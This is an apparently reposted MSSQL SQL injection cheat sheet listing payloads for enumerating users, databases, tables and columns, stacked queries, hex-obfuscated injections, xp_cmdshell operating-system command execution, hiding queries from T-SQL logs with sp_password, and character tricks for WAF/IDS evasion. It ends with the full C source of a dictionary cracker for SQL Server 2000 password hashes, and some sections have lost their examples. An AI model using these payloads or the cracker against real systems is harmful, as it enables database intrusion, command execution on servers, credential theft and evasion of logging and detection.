标签：des   style   http   color   strong   os   

MSSQL

Default Databases

Comment Out Query

The following can be used to comment out the rest of the query after your injection:

Example:

• SELECT * FROM Users WHERE username = ‘‘ OR 1=1 --‘ AND password = ‘‘;
• SELECT * FROM Users WHERE id = ‘‘ UNION SELECT 1, 2, 3/*‘;

Testing Version

• @@VERSION

Example:

• True if MSSQL version is 2008.
• SELECT * FROM Users WHERE id = ‘1‘ AND @@VERSION LIKE ‘%2008%‘;

Note:

• Output will also contain the version of the Windows Operating System.

Database Credentials

Example:

• Return current user:
• SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;

• Check if user is admin:
• SELECT (CASE WHEN (IS_SRVROLEMEMBER(‘sysadmin‘)=1) THEN ‘1‘ ELSE ‘0‘ END);

Database Names

Examples:

• SELECT DB_NAME(5);
• SELECT name FROM master..sysdatabases;

Server Hostname

Examples:

• SELECT SERVERPROPERTY(‘productversion‘), SERVERPROPERTY(‘productlevel‘), SERVERPROPERTY(‘edition‘);

Note:

• SERVERPROPERTY() is available from MSSQL 2005 and higher.

Tables and Columns

Determining number of columns

ORDER BY n+1;
Example:

Given the query: SELECT username, password, permission FROM Users WHERE id = ‘1‘;

Note:

• Keep incrementing the number until you get a False response.

The following can be used to get the columns in the current query.

GROUP BY / HAVING
Example:

Given the query: SELECT username, password, permission FROM Users WHERE id = ‘1‘;

Note:

• No error will be returned once all columns have been included.

Retrieving Tables

We can retrieve the tables from two different databases, information_schema.tables or from master..sysobjects.

Note:

• Xtype = ‘U‘ is for User-defined tables. You can use ‘V‘ for views.

Retrieving Columns

We can retrieve the columns from two different databases, information_schema.columns or masters..syscolumns.

Retrieving Multiple Tables/Columns at once

The following 3 queries will create a temporary table/column and insert all the user-defined tables into it. It will then dump the table content and finish by deleting the table.

• Create Temp Table/Column and Insert Data:
• AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=‘:‘ SELECT @xy=@xy+‘ ‘+name FROM sysobjects WHERE xtype=‘U‘ AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
• Dump Content:
• AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
• Delete Table:
• AND 1=0; DROP TABLE TMP_DB;

An easier method is available starting with MSSQL 2005 and higher. The XML function path() works as a concatenator, allowing the retrieval of all tables with 1 query.

Note:

• You can encode your query in hex to "obfuscate" your attack.
• ‘ AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

Avoiding the use of quotations

String Concatenation

Conditional Statements

Examples:

• IF 1=1 SELECT ‘true‘ ELSE SELECT ‘false‘;
• SELECT CASE WHEN 1=1 THEN true ELSE false END;

Note:

• IF cannot be used inside a SELECT statement.

Timing

• WAITFOR DELAY ‘time_to_pass‘;
• WAITFOR TIME ‘time_to_execute‘;

Example:

• IF 1=1 WAITFOR DELAY ‘0:0:5‘ ELSE WAITFOR DELAY ‘0:0:0‘;

OPENROWSET Attacks

System Command Execution

Include an extended stored procedure named xp_cmdshell that can be used to execute operating system commands.

• EXEC master.dbo.xp_cmdshell ‘cmd‘;

Starting with version MSSQL 2005 and higher, xp_cmdshell is disabled by default, but can be activated with the following queries:

Alternatively, you can create your own procedure to achieve the same results:

If the SQL version is higher than 2000, you will have to run additional queries in order the execute the previous command:

Example:

• Checks to see if xp_cmdshell is loaded, if it is, it checks if it is active and then proceeds to run the ‘dir‘ command and inserts the results into TMP_DB:
• ‘ IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME=‘TMP_DB‘) DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N‘[dbo].[xp_cmdshell]‘) AND OBJECTPROPERTY (id, N‘IsExtendedProc‘) = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure ‘xp_cmdshell‘ IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell ‘dir‘ SELECT @a=‘‘ SELECT @a=Replace(@a%2B‘<br></font><font color="black">‘%2Bdir,‘<dir>‘,‘</font><font color="orange">‘) FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a=‘xp_cmdshell not enabled‘ DROP TABLE %23xp_cmdshell END ELSE SELECT @a=‘xp_cmdshell not found‘ SELECT @a AS tbl INTO TMP_DB--
• Dump Content:
• ‘ UNION SELECT tbl FROM TMP_DB--
• Delete Table:
• ‘ DROP TABLE TMP_DB--

SP_PASSWORD (Hiding Query)

Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure.

• SP_PASSWORD

Example:

• ‘ AND 1=1--sp_password

Output:

-- ‘sp_password‘ was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
					

Stacked Queries

MSSQL supports stacked queries.

Example:

• ‘ AND 1=0 INSERT INTO ([column1], [column2]) VALUES (‘value1‘, ‘value2‘);

Fuzzing and Obfuscation

Allowed Intermediary Characters

The following characters can be used as whitespaces.

Examples:

• S%E%L%E%C%T%01column%02FROM%03table;
• A%%ND 1=%%%%%%%%1;

Note:

• The percentage signs in between keywords is only possible on ASP(x) web applications.

The following characters can be also used to avoid the use of spaces.

Examples:

• UNION(SELECT(column)FROM(table));
• SELECT"table_name"FROM[information_schema].[tables];

Allowed Intermediary Characters after AND/OR

Example:

• SELECT 1FROM[table]WHERE\1=\1AND\1=\1;

Note:

• The backslash does not seem to work with MSSQL 2000.

Encodings

Encoding your injection can sometimes be useful for WAF/IDS evasion.

Password Hashing

Passwords begin with 0x0100, the first for bytes following the 0x are a constant; the next eight bytes are the hash salt and the remaining 80 bytes are two hashes, the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the uppercase version.

Password Cracking

A Metasploit module for JTR can be found here.

MSSQL 2000 Password Cracker

This tool is designed to crack Microsoft SQL Server 2000 passwords.

/////////////////////////////////////////////////////////////////////////////////
//
//           SQLCrackCl
//
//           This will perform a dictionary attack against the
//           upper-cased hash for a password. Once this
//           has been discovered try all case variant to work
//           out the case sensitive password.
//
//           This code was written by David Litchfield to
//           demonstrate how Microsoft SQL Server 2000
//           passwords can be attacked. This can be
//           optimized considerably by not using the CryptoAPI.
//
//           (Compile with VC++ and link with advapi32.lib
//           Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
	         int err = 0;
	    if(argc !=3)
	              {
	                        printf("\n\n*** SQLCrack *** \n\n");
	                        printf("C:\\>%s hash passwd-file\n\n",argv[0]);
	                        printf("David Litchfield (david@ngssoftware.com)\n");
	                        printf("24th June 2002\n");
	                        return 0;
	              }
	    err = OpenPasswordFile(argv[2]);
	    if(err !=0)
	     {
	       return printf("\nThere was an error opening the password file %s\n",argv[2]);
	     }
	    err = CrackPassword(argv[1]);
	    fclose(fd);
	    printf("\n\n%d",wd);
	    return 0;
}
int OpenPasswordFile(char *pwdfile)
{
	    fd = fopen(pwdfile,"r");
	    if(fd)
	              return 0;
	    else
	              return 1;
}
int CrackPassword(char *hash)
{
	    char phash[100]="";
	    char pheader[8]="";
	    char pkey[12]="";
	    char pnorm[44]="";
	    char pucase[44]="";
	    char pucfirst[8]="";
	    char wttf[44]="";
	    char uwttf[100]="";
	    char *wp=NULL;
	    char *ptr=NULL;
	    int cnt = 0;
	    int count = 0;
	    unsigned int key=0;
	    unsigned int t=0;
	    unsigned int address = 0;
	    unsigned char cmp=0;
	    unsigned char x=0;
	    HCRYPTPROV hProv=0;
	    HCRYPTHASH hHash;
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
	      {
	              return printf("\nThe password hash is too short!\n");
	      }
if(hash[0]==0x30 && (hash[1]== ‘x‘ || hash[1] == ‘X‘))
	      {
	              hash = hash + 2;
	              strncpy(pheader,hash,4);
	              printf("\nHeader\t\t: %s",pheader);
	              if(strlen(pheader)!=4)
	                        return printf("%s",lerr);
	              hash = hash + 4;
	              strncpy(pkey,hash,8);
	              printf("\nRand key\t: %s",pkey);
	              if(strlen(pkey)!=8)
	                        return printf("%s",lerr);
	              hash = hash + 8;
	              strncpy(pnorm,hash,40);
	              printf("\nNormal\t\t: %s",pnorm);
	              if(strlen(pnorm)!=40)
	                        return printf("%s",lerr);
	              hash = hash + 40;
	              strncpy(pucase,hash,40);
	              printf("\nUpper Case\t: %s",pucase);
	              if(strlen(pucase)!=40)
	                        return printf("%s",lerr);
	              strncpy(pucfirst,pucase,2);
	              sscanf(pucfirst,"%x",&cmp);
	      }
else
	      {
	              return printf("The password hash has an invalid format!\n");
	      }
printf("\n\n       Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL                 ,0))
  {
	      if(GetLastError()==NTE_BAD_KEYSET)
	              {
	                        // KeySet does not exist. So create a new keyset
	                        if(!CryptAcquireContext(&hProv,
	                                             NULL,
	                                             NULL,
	                                             PROV_RSA_FULL,
	                                             CRYPT_NEWKEYSET ))
	                           {
	                                    printf("FAILLLLLLL!!!");
	                                    return FALSE;
	                           }
	       }
}
while(1)
	     {
	       // get a word to try from the file
	       ZeroMemory(wttf,44);
	       if(!fgets(wttf,40,fd))
	          return printf("\nEnd of password file. Didn‘t find the password.\n");
	       wd++;
	       len = strlen(wttf);
	       wttf[len-1]=0x00;
	       ZeroMemory(uwttf,84);
	       // Convert the word to UNICODE
	       while(count < len)
	                 {
	                           uwttf[cnt]=wttf[count];
	                           cnt++;
	                           uwttf[cnt]=0x00;
	                           count++;
	                           cnt++;
	                 }
	       len --;
	       wp = &uwttf;
	       sscanf(pkey,"%x",&key);
	       cnt = cnt - 2;
	       // Append the random stuff to the end of
	       // the uppercase unicode password
	       t = key >> 24;
	       x = (unsigned char) t;
	       uwttf[cnt]=x;
	       cnt++;
	       t = key << 8;
	       t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
	     t = key << 16;
	     t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
	     t = key << 24;
	     t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
	     {
	               printf("Error %x during CryptCreatHash!\n", GetLastError());
	               return 0;
	     }
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
	     {
	               printf("Error %x during CryptHashData!\n", GetLastError());
	               return FALSE;
	     }
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
	     {
	               // If first byte matches try the rest
	               ptr = pucase;
	               cnt = 1;
	               while(cnt < 20)
	               {
	                           ptr = ptr + 2;
	                           strncpy(pucfirst,ptr,2);
	                           sscanf(pucfirst,"%x",&cmp);
	                           if(szhash[cnt]==cmp)
	                                    cnt ++;
	                           else
	                           {
	                                    break;
	                           }
	               }
	               if(cnt == 20)
	               {
	                    // We‘ve found the password
	                    printf("\nA MATCH!!! Password is %s\n",wttf);
	                    return 0;
	                 }
	         }
	         count = 0;
	         cnt=0;
	       }
  return 0;
}
					

SQL Injection 字典 - MSSQL,布布扣,bubuko.com

SQL Injection 字典 - MSSQL

标签：des   style   http   color   strong   os   

原文地址：http://www.cnblogs.com/shengxinking/p/3854263.html